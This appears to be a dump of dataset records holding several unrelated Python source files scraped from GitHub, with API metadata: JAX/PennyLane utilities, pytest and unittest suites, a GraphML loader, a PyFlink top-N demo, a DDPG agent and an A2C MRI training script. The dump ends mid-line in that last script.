member.update(id=member_id, status=new_status)\n\n", "repo_name": "ericgibert/zhima", "sub_path": "zhima/transaction.py", "file_name": "transaction.py", "file_ext": "py", "file_size_in_byte": 3174, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model_db.Database", "line_number": 58, "usage_type": "name"}, {"api_name": "member.Member.MEMBERSHIP", "line_number": 68, "usage_type": "attribute"}, {"api_name": "member.Member", "line_number": 68, "usage_type": "name"}, {"api_name": "member.Member", "line_number": 72, "usage_type": "call"}, {"api_name": 
"datetime.date.today", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 74, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 96, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 96, "usage_type": "name"}, {"api_name": "member.Member", "line_number": 99, "usage_type": "call"}, {"api_name": "member.update", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "11021175548", "text": "import jax.numpy as jnp\nimport jraph\nimport optax\nfrom typing import Dict, Any\nimport pennylane as qml\n\ndef replace_globals(graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:\n\t\"\"\"Replaces the globals attribute with a constant feature for each graph.\"\"\"\n\treturn graphs._replace(\n\t\t\tglobals=jnp.ones([graphs.n_node.shape[0], 1]))\n\ndef create_optimizer(\n\t\tconfig) -> optax.GradientTransformation:\n\t\"\"\"Creates an optimizer, as specified by the config.\"\"\"\n\tif config.optimizer == 'adam':\n\t\treturn optax.adam(\n\t\t\t\tlearning_rate=config.learning_rate)\n\tif config.optimizer == 'sgd':\n\t\treturn optax.sgd(\n\t\t\t\tlearning_rate=config.learning_rate,\n\t\t\t\tmomentum=config.momentum)\n\traise ValueError(f'Unsupported optimizer: {config.optimizer}.')\n\ndef add_prefix_to_keys(result: Dict[str, Any], prefix: str) -> Dict[str, Any]:\n \"\"\"Adds a prefix to the keys of a dict, returning a new dict.\"\"\"\n return {f'{prefix}_{key}': val for key, val in result.items()}\n\ndef circuit(x, params, n):\n\tw, b = params\n\tz = jnp.dot(x, w) + b\n\tfor i in range(n):\n\t\tqml.RX(z[i], wires=i)\n", "repo_name": "Gopal-Dahale/QMLHEP-Tasks-2023", "sub_path": "Task_V/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "jraph.GraphsTuple", "line_number": 7, "usage_type": "attribute"}, {"api_name": "jax.numpy.ones", "line_number": 10, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 10, "usage_type": "name"}, {"api_name": "optax.adam", "line_number": 16, "usage_type": "call"}, {"api_name": "optax.sgd", "line_number": 19, "usage_type": "call"}, {"api_name": "optax.GradientTransformation", "line_number": 13, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 24, "usage_type": "name"}, {"api_name": "jax.numpy.dot", "line_number": 30, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 30, "usage_type": "name"}, {"api_name": "pennylane.RX", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "23676907320", "text": "import pytest\nfrom hal_hw_interface.hal_io_comp import HalIO\nfrom pprint import pformat\nimport yaml\nimport os\n\n\nclass TestHalIO:\n test_class = HalIO\n rclpy_patches = [\n \"hal_hw_interface.hal_obj_base.rclpy\",\n \"hal_hw_interface.ros_hal_component.rclpy\",\n ]\n\n def flatten_keys(self, prefix, data, result=dict()):\n for key, val in data.items():\n new_prefix = \"/\".join([prefix, key])\n if not isinstance(val, dict):\n result[new_prefix] = val\n else:\n self.flatten_keys(new_prefix, val, result)\n return result\n\n @pytest.fixture\n def config(self):\n self.config_file = os.path.join(\n os.path.dirname(__file__), \"hal_io.conf.yaml\"\n )\n with open(self.config_file, \"r\") as f:\n self.config = yaml.safe_load(f)\n print(\"hal_io config:\", pformat(self.config))\n yield self.config\n\n @pytest.fixture\n def obj(self, mock_hal_comp, mock_rclpy, config):\n self.test_class._cached_objs.clear()\n obj = self.test_class([self.config_file])\n obj.setup_component()\n yield obj\n\n def test_hal_io_comp_setup_component(self, obj, config):\n # Put pins in dict\n obj_pins = dict()\n for pin in obj.pins:\n obj_pins[pin.name] = pin\n\n for config_key, pins in config.items():\n print(\"\\n\\nPin class: %s\" % config_key)\n for pin_name, pin_data in pins.items():\n print(\"pin_name:\", pin_name, \"pin_data:\", pin_data)\n # Check pin was created\n assert pin_name in obj_pins\n # Check pin attributes\n pin = obj_pins[pin_name]\n print(\" name %s; data %s\" % (pin_name, pin_data))\n print(\" pin %s\" % pin)\n for key, val in pin_data.items():\n assert str(getattr(pin, key)) == val\n\n def test_hal_io_comp_update(self, obj, mock_hal_comp):\n # Check that pins' update() method was called\n for pin in obj.pins: # Init pin values\n self.pvals[pin.name] = 1\n\n # Run update() and check that pins changed\n obj.update()\n print(\"publishers\", pformat(self.publishers))\n print(\"pin values\", pformat(self.pvals))\n for pin in obj.pins:\n print(f\"- pin {pin}\")\n publisher = self.publishers[pin.pub_topic]\n publisher.publish.assert_called()\n", "repo_name": "tormach/hal_ros_control", "sub_path": "hal_hw_interface/hal_hw_interface/tests/test_hal_io_comp.py", "file_name": "test_hal_io_comp.py", "file_ext": "py", "file_size_in_byte": 2467, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "31", "api": [{"api_name": "hal_hw_interface.hal_io_comp.HalIO", "line_number": 9, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 30, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 31, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 67, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "16286376937", "text": "import os\nimport json\nimport tempfile\nimport unittest\nfrom datetime import datetime\n\nimport miniurl\n\n\nclass MiniUrlBaseCase(unittest.TestCase):\n\n def setUp(self):\n self.db_fd, self.path = tempfile.mkstemp()\n miniurl.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + self.path\n miniurl.app.config['TESTING'] = True\n self.db = miniurl.db\n self.db.create_all()\n self.app = miniurl.app.test_client()\n\n def tearDown(self):\n self.db.session.remove()\n self.db.drop_all()\n os.close(self.db_fd)\n os.unlink(self.path)\n\n\nclass MiniUrlRoutesTestCase(MiniUrlBaseCase):\n\n def test_can_get_homepage(self):\n res = self.app.get('/')\n self.assertEqual(200, res.status_code)\n self.assertIn('Mini URL', res.data)\n\n def test_can_post_homepage(self):\n res = self.app.post(\n '/',\n data=dict(url='http://foobar.com'),\n follow_redirects=True\n )\n self.assertEqual(200, res.status_code)\n self.assertIn('Mini URL', res.data)\n\n def test_can_get_statspage(self):\n res = self.app.get('/stats')\n self.assertEqual(200, res.status_code)\n\n\nclass MiniUrlStatTestCase(MiniUrlBaseCase):\n\n def setUp(self):\n MiniUrlBaseCase.setUp(self)\n stats = miniurl.Stats(\n 'foo platform',\n 'foo browser',\n 'foo version',\n 'foo language',\n 'foo ua string',\n 'foo ip'\n )\n self.db.session.add(stats)\n self.db.session.commit()\n\n def get_endpoint(self, endpoint):\n res = self.app.get('/data/' + endpoint)\n data = json.loads(res.data)\n return res, data\n\n def test_can_get_data_browsers_endpoint(self):\n res, data = self.get_endpoint('browsers')\n self.assertEqual('application/json', res.mimetype)\n self.assertIn('foo browser', data.keys())\n\n def test_can_get_data_platforms_endpoint(self):\n res, data = self.get_endpoint('platforms')\n self.assertEqual('application/json', res.mimetype)\n self.assertIn('foo platform', data.keys())\n\n def test_can_get_data_months_endpoint(self):\n res, data = self.get_endpoint('months')\n month_today = datetime.today().strftime('%b')\n self.assertEqual('application/json', res.mimetype)\n self.assertIn(month_today, data.keys())\n", "repo_name": "rsiemens/mini-url", "sub_path": "app/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tempfile.mkstemp", "line_number": 13, "usage_type": "call"}, {"api_name": "miniurl.app", "line_number": 14, "usage_type": "attribute"}, {"api_name": "miniurl.app", "line_number": 15, "usage_type": "attribute"}, {"api_name": "miniurl.db", "line_number": 16, "usage_type": "attribute"}, {"api_name": "miniurl.app.test_client", "line_number": 18, "usage_type": "call"}, {"api_name": "miniurl.app", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.close", "line_number": 23, "usage_type": "call"}, {"api_name": "os.unlink", "line_number": 24, "usage_type": "call"}, {"api_name": "miniurl.Stats", "line_number": 52, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 80, "usage_type": "name"}]}
+{"seq_id": "42026096548", "text": "from pygraphml import GraphMLParser\nimport networkx as nx\nimport formats\n\n# Node attributes not to be imported for analysis purposes\nattr_blacklist=['x','y']\n\n# Load GraphML file and return a NetworkX graph object\n#\n# The NetworkX GraphML parser is too picky, so we use the one\n# from pygraphml and translate the graph\ndef _graphml2nx(fname):\n\tg=nx.DiGraph()\n\tdef _attrdict(node):\n\t\tattrs=node.attributes()\n\t\treturn {key:attrs[key].value for key in attrs if key not in attr_blacklist}\n\tparser=GraphMLParser()\n\timported_graph=parser.parse(fname)\n\tedges=[(edge.node1.id, edge.node2.id) for edge in imported_graph.edges()]\n\tnodes=[(node.id, _attrdict(node)) for node in imported_graph.nodes()]\n\tg.add_edges_from(edges)\n\tg.add_nodes_from(nodes)\n\tassert(nx.is_tree(g))\n\tassert(nx.is_directed(g))\n\treturn g\n\n# Check the file for its format and return the correct deplytics object\ndef loader(fname):\n\twith open(fname,\"r\") as f:\n\t\tdata=f.read()\n\t\tfor tree_class in formats._all:\n\t\t\tif tree_class.DATA_IDENTIFIER in data:\n\t\t\t\treturn tree_class(_graphml2nx(fname))\n", "repo_name": "troeger/deplytics", "sub_path": "formats/importer.py", "file_name": "importer.py", "file_ext": "py", "file_size_in_byte": 1055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "networkx.DiGraph", "line_number": 13, "usage_type": "call"}, {"api_name": "pygraphml.GraphMLParser", "line_number": 17, "usage_type": "call"}, {"api_name": "networkx.is_tree", "line_number": 23, "usage_type": "call"}, {"api_name": "networkx.is_directed", "line_number": 24, "usage_type": "call"}, {"api_name": "formats._all", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "29207219137", "text": "#!/usr/bin/python\n# -*- coding:UTF-8 -*-\nfrom typing import Iterable\n\nfrom pyflink.common import SimpleStringSchema, Duration, WatermarkStrategy, Time\nfrom pyflink.common.watermark_strategy import TimestampAssigner\nfrom pyflink.datastream import StreamExecutionEnvironment, AggregateFunction, ProcessWindowFunction, \\\n KeyedProcessFunction\nfrom pyflink.datastream.connectors.kafka import KafkaSource, KafkaOffsetsInitializer\nfrom pyflink.datastream.window import SlidingEventTimeWindows, TimeWindow\n\nfrom functions.func import WSMapFunction\nfrom model.water_sensor import WaterSensor\n\n\nclass KeyedProcessFunctionTopN(TimestampAssigner):\n def extract_timestamp(self, value: WaterSensor, record_timestamp: int) -> int:\n yield value.ts * 1000\n\n\nclass VcCountAgg(AggregateFunction):\n def create_accumulator(self):\n return 0\n\n def add(self, value, accumulator):\n return accumulator + 1\n\n def get_result(self, accumulator):\n return accumulator\n\n def merge(self, acc_a, acc_b):\n return None\n\n\nclass WindowResult(ProcessWindowFunction[int, tuple, str, TimeWindow]):\n \"\"\"\n 第一个:输入类型 = 增量函数的输出 count值,Integer\n 第二个:输出类型 = Tuple3(vc,count,windowEnd) ,带上 窗口结束时间 的标签\n 第三个:key类型 , vc,Integer\n 第四个:窗口类型\n \"\"\"\n\n def process(self,\n key: int,\n context: 'ProcessWindowFunction.Context',\n elements: Iterable[int]) -> Iterable[tuple]:\n # 迭代器里面只有一条数据,next一次即可\n count = len([e for e in elements])\n window_end = context.window().end\n yield key, count, window_end\n\n\nclass TopN(KeyedProcessFunction):\n def __init__(self, threshold):\n # 要取的Top数量\n self.threshold = threshold\n # 存不同窗口的 统计结果,key=windowEnd,value=list数据\n self.data_list_map = {}\n\n def process_element(self, value, ctx: 'KeyedProcessFunction.Context'):\n # 进入这个方法,只是一条数据,要排序,得到齐才行 ===》 存起来,不同窗口分开存\n window_end = value[1]\n if window_end in self.data_list_map.keys():\n # 1.1 包含vc,不是该vc的第一条,直接添加到List中\n data_list = []\n key = self.data_list_map.get(window_end)\n data_list.append(value)\n # self.data_list_map[key] = data_list\n else:\n # 不包含vc,是该vc的第一条,需要初始化list\n data_list = [value]\n self.data_list_map[window_end] = data_list\n\n # 2. 
注册一个定时器, windowEnd+1ms即可\n # 同一个窗口范围,应该同时输出,只不过是一条一条调用processElement方法,只需要延迟1ms即可\n ctx.timer_service().register_event_time_timer(window_end + 1)\n\n def on_timer(self, timestamp: int, ctx: 'KeyedProcessFunction.OnTimerContext'):\n # 定时器触发,同一个窗口范围的计算结果攒齐了,开始 排序、取TopN\n window_end = ctx.get_current_key()\n data_list = self.data_list_map.get(window_end)\n\n yield data_list\n\n\ndef keyed_process_function_topN_demo():\n env = StreamExecutionEnvironment.get_execution_environment()\n\n env.set_parallelism(1)\n\n brokers = \"localhost:9092\"\n source = KafkaSource.builder() \\\n .set_bootstrap_servers(brokers) \\\n .set_topics(\"pyflink_kafka\") \\\n .set_group_id(\"my-group\") \\\n .set_starting_offsets(KafkaOffsetsInitializer.latest()) \\\n .set_value_only_deserializer(SimpleStringSchema()) \\\n .build()\n\n sensor_ds = env.from_source(\n source,\n WatermarkStrategy.for_bounded_out_of_orderness(Duration.of_seconds(3)).with_timestamp_assigner(\n KeyedProcessFunctionTopN()\n ),\n \"Kafka Source\"\n ).map(WSMapFunction())\n\n sensor_window_agg = sensor_ds.key_by(lambda sensor: sensor.id) \\\n .window(SlidingEventTimeWindows.of(Time.seconds(10), Time.seconds(5))) \\\n .aggregate(\n VcCountAgg(),\n WindowResult()\n )\n\n sensor_window_agg_ks = sensor_window_agg.key_by(lambda r: r[2])\n # sensor_window_agg_ks.print()\n sensor_window_agg_ks.process(TopN(2)).print()\n\n # sensor_ds.print()\n\n env.execute(\"KeyedProcessFunctionTopN\")\n\n\nif __name__ == '__main__':\n keyed_process_function_topN_demo()\n", "repo_name": "huanglaoxie0503/pyflink-basic-introduction", "sub_path": "process/keyed_process_function_topN.py", "file_name": "keyed_process_function_topN.py", "file_ext": "py", "file_size_in_byte": 4466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyflink.common.watermark_strategy.TimestampAssigner", "line_number": 16, "usage_type": "name"}, {"api_name": "model.water_sensor.WaterSensor", "line_number": 17, "usage_type": "name"}, {"api_name": "pyflink.datastream.AggregateFunction", "line_number": 21, "usage_type": "name"}, {"api_name": "pyflink.datastream.ProcessWindowFunction", "line_number": 35, "usage_type": "name"}, {"api_name": "pyflink.datastream.window.TimeWindow", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 46, "usage_type": "name"}, {"api_name": "pyflink.datastream.KeyedProcessFunction", "line_number": 53, "usage_type": "name"}, {"api_name": "pyflink.datastream.StreamExecutionEnvironment.get_execution_environment", "line_number": 87, "usage_type": "call"}, {"api_name": "pyflink.datastream.StreamExecutionEnvironment", "line_number": 87, "usage_type": "name"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaSource.builder", "line_number": 92, "usage_type": "call"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaSource", "line_number": 92, "usage_type": "name"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaOffsetsInitializer.latest", "line_number": 96, "usage_type": "call"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaOffsetsInitializer", "line_number": 96, "usage_type": "name"}, {"api_name": "pyflink.common.SimpleStringSchema", "line_number": 97, "usage_type": "call"}, {"api_name": "pyflink.common.WatermarkStrategy.for_bounded_out_of_orderness", "line_number": 102, "usage_type": "call"}, {"api_name": "pyflink.common.WatermarkStrategy", "line_number": 102, "usage_type": "name"}, {"api_name": 
"pyflink.common.Duration.of_seconds", "line_number": 102, "usage_type": "call"}, {"api_name": "pyflink.common.Duration", "line_number": 102, "usage_type": "name"}, {"api_name": "functions.func.WSMapFunction", "line_number": 106, "usage_type": "call"}, {"api_name": "pyflink.datastream.window.SlidingEventTimeWindows.of", "line_number": 109, "usage_type": "call"}, {"api_name": "pyflink.datastream.window.SlidingEventTimeWindows", "line_number": 109, "usage_type": "name"}, {"api_name": "pyflink.common.Time.seconds", "line_number": 109, "usage_type": "call"}, {"api_name": "pyflink.common.Time", "line_number": 109, "usage_type": "name"}]}
+{"seq_id": "22109718530", "text": "import torch.optim\nfrom torch.nn import MSELoss\nimport numpy as np\nimport copy\nfrom buffer import ReplayBuffer\nfrom model import Actor, Critic\n\n\nclass DDPGAgent:\n def __init__(self,\n dimS,\n dimA,\n gamma=0.99,\n actor_lr=1e-4,\n critic_lr=1e-3,\n tau=1e-3,\n sigma=0.1,\n hidden_size1=400,\n hidden_size2=300,\n buffer_size=int(1e6),\n batch_size=128,\n render=False):\n\n self.dimS = dimS\n self.dimA = dimA\n\n self.gamma = gamma\n self.pi_lr = actor_lr\n self.q_lr = critic_lr\n self.tau = tau\n self.sigma = sigma\n\n self.batch_size = batch_size\n # networks definition\n # pi : actor network, Q : critic network\n self.pi = Actor(dimS, dimA, hidden_size1, hidden_size2)\n self.Q = Critic(dimS, dimA, hidden_size1, hidden_size2)\n\n # target networks\n self.targ_pi = copy.deepcopy(self.pi)\n self.targ_Q = copy.deepcopy(self.Q)\n\n self.buffer = ReplayBuffer(dimS, dimA, limit=buffer_size)\n\n self.Q_optimizer = torch.optim.Adam(self.Q.parameters(), lr=self.q_lr)\n self.pi_optimizer = torch.optim.Adam(self.pi.parameters(), lr=self.pi_lr)\n\n self.render = render\n\n def target_update(self):\n # soft-update for both actors and critics\n # \\theta^\\prime = \\tau * \\theta + (1 - \\tau) * \\theta^\\prime\n for th, targ_th in zip(self.pi.parameters(), self.targ_pi.parameters()): # th : theta\n targ_th.data.copy_(self.tau * th.data + (1.0 - self.tau) * targ_th.data)\n\n for th, targ_th in zip(self.Q.parameters(), self.targ_Q.parameters()):\n targ_th.data.copy_(self.tau * th.data + (1.0 - self.tau) * targ_th.data)\n\n def get_action(self, state, eval=False):\n\n state = torch.tensor(state, dtype=torch.float)\n\n with torch.no_grad():\n action = self.pi(state)\n action = action.numpy()\n if not eval:\n # for exploration, we use a behavioral policy of the form\n # \\beta(s) = \\pi(s) + N(0, \\sigma^2)\n noise = self.sigma * np.random.randn(self.dimA)\n return action + noise\n else:\n return action\n\n def train(self):\n \"\"\"\n train actor-critic network using DDPG\n \"\"\"\n\n batch = self.buffer.sample_batch(batch_size=self.batch_size)\n\n # unroll batch\n observations = torch.tensor(batch['state'], dtype=torch.float)\n actions = torch.tensor(batch['action'], dtype=torch.float)\n rewards = torch.tensor(batch['reward'], dtype=torch.float)\n next_observations = torch.tensor(batch['next_state'], dtype=torch.float)\n terminal_flags = torch.tensor(batch['done'], dtype=torch.float)\n\n mask = torch.tensor([1.]) - terminal_flags\n\n # compute TD targets based on target networks\n # if done, set target value to reward\n\n target = rewards + self.gamma * mask * self.targ_Q(next_observations, self.targ_pi(next_observations))\n\n out = self.Q(observations, actions)\n loss_ftn = MSELoss()\n loss = loss_ftn(out, target)\n self.Q_optimizer.zero_grad()\n loss.backward()\n self.Q_optimizer.step()\n\n pi_loss = - torch.mean(self.Q(observations, self.pi(observations)))\n self.pi_optimizer.zero_grad()\n pi_loss.backward()\n self.pi_optimizer.step()\n\n self.target_update()\n\n def save_model(self, path):\n checkpoint_path = path + 'model.pth.tar'\n torch.save(\n {'actor': self.pi.state_dict(),\n 'critic': self.Q.state_dict(),\n 'target_actor': self.targ_pi.state_dict(),\n 'target_critic': self.targ_Q.state_dict(),\n 'actor_optimizer': self.pi_optimizer.state_dict(),\n 'critic_optimizer': self.Q_optimizer.state_dict()\n },\n checkpoint_path)\n\n return\n\n def load_model(self, path):\n checkpoint = torch.load(path)\n\n self.pi.load_state_dict(checkpoint['actor'])\n 
self.Q.load_state_dict(checkpoint['critic'])\n self.targ_pi.load_state_dict(checkpoint['target_actor'])\n self.targ_Q.load_state_dict(checkpoint['target_critic'])\n self.pi_optimizer.load_state_dict(checkpoint['actor_optimizer'])\n self.Q_optimizer.load_state_dict(checkpoint['critic_optimizer'])\n\n return\n\n\nif __name__ == '__main__':\n agent = DDPGAgent(3, 2, 1)\n print(agent.pi.state_dict())", "repo_name": "npex2020rl/rl", "sub_path": "day4/ddpg/ddpg_agent.py", "file_name": "ddpg_agent.py", "file_ext": "py", "file_size_in_byte": 4676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model.Actor", "line_number": 36, "usage_type": "call"}, {"api_name": "model.Critic", "line_number": 37, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 40, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 41, "usage_type": "call"}, {"api_name": "buffer.ReplayBuffer", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.optim.optim.Adam", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.optim.optim", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.optim.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.optim.tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.optim.no_grad", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.random.randn", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 86, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 102, "usage_type": "name"}, {"api_name": 
"torch.optim.save", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.optim.load", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 124, "usage_type": "name"}]}
+{"seq_id": "4221665151", "text": "import argparse\nimport json\nimport random\nfrom matplotlib.style import use\nimport numpy as np\nimport torch\nimport os\nfrom activemri.envs.sparse_vecenvs import SparseVecEnv\nfrom activemri.feature_extractor import extractor\nfrom stable_baselines3.common import env_checker\nfrom stable_baselines3 import A2C\nimport matplotlib\nimport time\nmatplotlib.use('Agg')\n\ndef train(args):\n #####################\n #---- build env ----#\n #####################\n train_env = SparseVecEnv(args, mode='train')\n print('--- Successfully load environment ---\\n')\n print(\"Number of available actions:\", train_env.action_space.n)\n # env_checker.check_env(env)\n\n\n ##################\n #---- policy ----#\n ##################\n policy_kwargs = {\n 'net_arch': dict(), \n 'features_extractor_class': extractor.Extractor, \n 'features_extractor_kwargs': {'opts': args}, \n }\n \n #################\n #---- train ----#\n #################\n model = A2C(\n policy = 'MultiInputPolicy', \n env = train_env, \n learning_rate = args.lr, \n n_steps = args.update_timestep, \n gamma = args.gamma, \n use_rms_prop = args.use_rms_prop, \n gae_lambda = args.gae_lambda, \n ent_coef = args.entropy_coef, \n vf_coef = args.value_loss_coef, \n tensorboard_log = args.checkpoints_dir,\n policy_kwargs = policy_kwargs, \n device = args.device, \n verbose = 1, \n seed = args.random_seed, \n )\n model.policy.action_net = extractor.Action_net().to(model.device)\n print(model.policy)\n print('n_envs:', model.n_envs)\n # resume\n if args.training_dir:\n model.set_parameters(args.training_dir, device=model.device)\n\n # learn\n for i in range(10):\n model.learn(total_timesteps=args.num_train_steps, log_interval=100, reset_num_timesteps=(i==0))\n model.save(args.checkpoints_dir+f'/final_model_{model.num_timesteps}')\n \n \ndef set_random_seeds(args):\n random.seed(args.random_seed)\n np.random.seed(args.random_seed)\n torch.manual_seed(args.random_seed)\n \n\ndef build_args():\n parser = argparse.ArgumentParser(description='MRI Reconstruction Example')\n\n # env\n parser.add_argument(\"--env_type\", type=str, default='sparse')\n \n # MRI setting parameters\n parser.add_argument(\"--budget\", type=int, default=10)\n parser.add_argument(\"--accelerate\", type=int, default=4)\n parser.add_argument(\"--num_parallel_episodes\", type=int, default=4)\n parser.add_argument(\"--device\", type=str, default='cpu')\n parser.add_argument(\"--random_seed\", type=int, default=0)\n parser.add_argument(\"--training_dir\", type=str, default=None)\n parser.add_argument(\"--checkpoints_dir\", type=str, default=None)\n parser.add_argument(\n \"--reward_metric\",\n type=str,\n choices=[\"mse\", \"ssim\", \"nmse\", \"psnr\"],\n default=\"ssim\",\n )\n # parser.add_argument(\"--resume\", action=\"store_true\")\n \n # A2C training parameters\n parser.add_argument(\"--gamma\", type=float, default=0.5)\n parser.add_argument(\"--use_rms_prop\", type=int, choices=[0, 1], default=1)\n parser.add_argument(\"--lr\", type=float, default=0.0003)\n parser.add_argument(\"--gae_lambda\", type=float, default=0.95)\n parser.add_argument(\"--value_loss_coef\", type=float, default=0.5)\n parser.add_argument(\"--entropy_coef\", type=float, default=0.01)\n parser.add_argument(\"--update_timestep\", type=int, default=1000)\n parser.add_argument(\"--num_train_steps\", type=int, default=1000)\n parser.add_argument(\"--num_workers\", type=int, default=4)\n \n # model parameters\n parser.add_argument('--fc_size', default=256, type=int, help='Size 
(width) of fully connected layer(s).')\n parser.add_argument(\"--ppo_model_type\",type=str,default=\"pg_mri\")\n \n # Mask parameters\n parser.add_argument('--accelerations', nargs='+', default=[8], type=int,\n help='Ratio of k-space columns to be sampled. If multiple values are '\n 'provided, then one of those is chosen uniformly at random for '\n 'each volume.')\n parser.add_argument(\"--low_frequency_mask_ratio\", type=int, default=8)\n parser.add_argument(\"--apply_attrs_padding\", type=int, default=0, choices=[0, 1])\n \n # Reconstructor parameters\n parser.add_argument(\"--recon_model_checkpoint\", type=str, default='../pg_mri/reconstructor/model.pt')\n parser.add_argument(\"--in_chans\", type=int, default=1, choices=[1, 2])\n parser.add_argument(\"--out_chans\", type=int, default=1)\n parser.add_argument(\"--num_chans\", type=int, default=16)\n parser.add_argument(\"--num_pool_layers\", type=int, default=4)\n parser.add_argument(\"--drop_prob\", type=float, default=0.)\n \n # Data parameters\n parser.add_argument(\"--dataset\", type=str, default='knee')\n parser.add_argument(\"--_data_location\", type=str, default='../pg_mri/dataset/knee_singlecoil')\n parser.add_argument('--resolution', default=128, type=int, help='Resolution of images')\n parser.add_argument('--sample_rate', type=float, default=0.5,\n help='Fraction of total volumes to include')\n parser.add_argument('--center_volume', type=int, default=1, choices=[0, 1], \n help='If set, only the center slices of a volume will be included in the dataset. This '\n 'removes the most noisy images from the data.')\n parser.add_argument('--acquisition', default=None,\n help='Use only volumes acquired using the provided acquisition method. Options are: '\n 'CORPD_FBK, CORPDFS_FBK (fat-suppressed), and not provided (both used).')\n \n # Finish\n \n args = parser.parse_args()\n \n # transfer\n args.apply_attrs_padding = True if args.apply_attrs_padding else False\n args.budget = int(args.resolution/args.accelerate - int(args.resolution/args.low_frequency_mask_ratio))\n args.use_rms_prop = 